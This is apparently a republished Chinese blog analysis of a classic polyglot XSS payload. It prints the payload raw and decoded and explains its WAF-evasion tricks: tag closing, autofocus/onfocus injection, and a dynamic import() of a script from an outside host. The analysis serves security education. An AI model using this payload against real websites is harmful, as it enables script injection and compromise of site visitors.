文章总结： 该文档分析了一个经过多重编码和混淆的XSSPayload，旨在绕过WAF检测。Payload利用JavaScript伪协议、换行符、多种引号及HTML实体进行混淆，并通过闭合常见HTML标签、注入新标签并设置onfocus事件来触发动态导入外部脚本。虽然由于语法错误可能无法直接执行，但展示了攻击者常用的编码绕过、注释嵌套、标签闭合与事件注入等混淆技术。 综合评分： 78 文章分类： WEB安全,渗透测试,漏洞分析

【XSS payload 】一个经典的XSS payload

原创

网络安全民工 网络安全民工

网络安全民工

2026年2月24日 18:01 天津

整体结构

原始Payload：

textJavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->

解码关键部分：

• %250A → 换行符 \n
• %26apos; → '（HTML实体单引号）
• \74 → 八进制 <
• \76 → 八进制 >

解码后大致为：

textJavaScript://\n/*?'/*\'/*"/*\"/*`/*\`/*&apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript><k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//>-->

注意末尾的 //> 和 --> 是分离的。

各组成部分的作用

1. JavaScript伪协议 + 换行绕过注释

• JavaScript:// 试图构造一个 javascript: URL（大小写不敏感），但多了一个斜杠，实际浏览器可能仍解析为伪协议。
• %250A 解码为换行符，用于结束单行注释 //，使得后续代码变为可执行。
• 在 javascript: URL 中，浏览器先对URL解码，然后执行得到的JavaScript代码。解码后为 JavaScript://\n...，其中 // 注释掉空内容，换行后代码开始执行。

2. 多种引号和注释混淆

• /*?'/*\'/*"/*\"/*/*/\*')/\*<!--这部分包含各种引号（单、双、反引号）及转义版本，以及HTML实体，旨在绕过WAF对特定字符的过滤。同时夹杂/\*和<!-- 注释，可能试图干扰解析器。

3. 闭合常见HTML标签

• </Title></Style></Script></textArea></iFrame></noScript> 试图关闭可能存在的父标签，使后续内容作为新的HTML插入，从而注入新元素。

4. 注入新标签及事件处理器

• \74k<K 解码为 <k<K，可能是 <k 或 <K 标签（不标准，但浏览器会尝试解析为标签名）。随后紧跟 /contentEditable/autoFocus/OnFocus=，这试图为标签设置属性：

• contentEditable 使元素可编辑

• autoFocus 使页面加载时自动获得焦点

• OnFocus 定义焦点事件的处理函数

• 属性值是一段JavaScript代码，其中包含多层注释和 import() 调用。

5. 事件处理函数中的JavaScript

OnFocus 的值：

text/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->

经过注释解析后，实际执行的代码为：

• { /**/ (import(/https: X55.is/.source)) }（前面的 /*...*/ 注释掉了 /*${/*/;，后面的 //> 注释掉剩余部分）。

• import(/https: X55.is/.source)：

• /https: X55.is/ 是一个正则表达式字面量，.source 返回其字符串内容 "https: X55.is"。

• 因此 import() 试图动态加载模块 "https: X55.is"，但该URL包含空格，实际无效。可能本意是加载 https://X55.is/，但写法有误。

• 如果加载成功，该外部脚本可能包含 alert() 或其他恶意代码。

6. HTML注释闭合

• 最后的 \76--> 解码为 >-->，可能试图闭合前面可能存在的 <!-- 注释，确保HTML结构完整。

攻击原理总结

该Payload尝试在多种上下文中执行：

• 作为 javascript: URL：若放在 href 或 src 中，点击或加载时会执行解码后的代码，触发动态导入。
• 作为HTML注入：若插入到页面中，它会闭合已有标签，创建新元素（如 <k>）并设置 onfocus 事件，当元素获得焦点（如通过 autofocus）时执行事件中的 import()。
• 动态导入：尝试加载外部脚本，若成功则可能弹出弹窗。

由于语法错误（import 参数格式不对），该Payload可能无法直接执行，但反映了攻击者常用的混淆技术，包括：

• URL编码绕过
• 注释嵌套和换行
• 多种引号组合
• 标签闭合和事件注入
• ES6动态导入

注意：实际测试时，import() 需要正确的模块URL，且受CORS限制，因此该Payload可能仅用于演示或绕过WAF的测试。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网络安全民工 网络安全民工 网络安全民工《【XSS payload 】一个经典的XSS payload》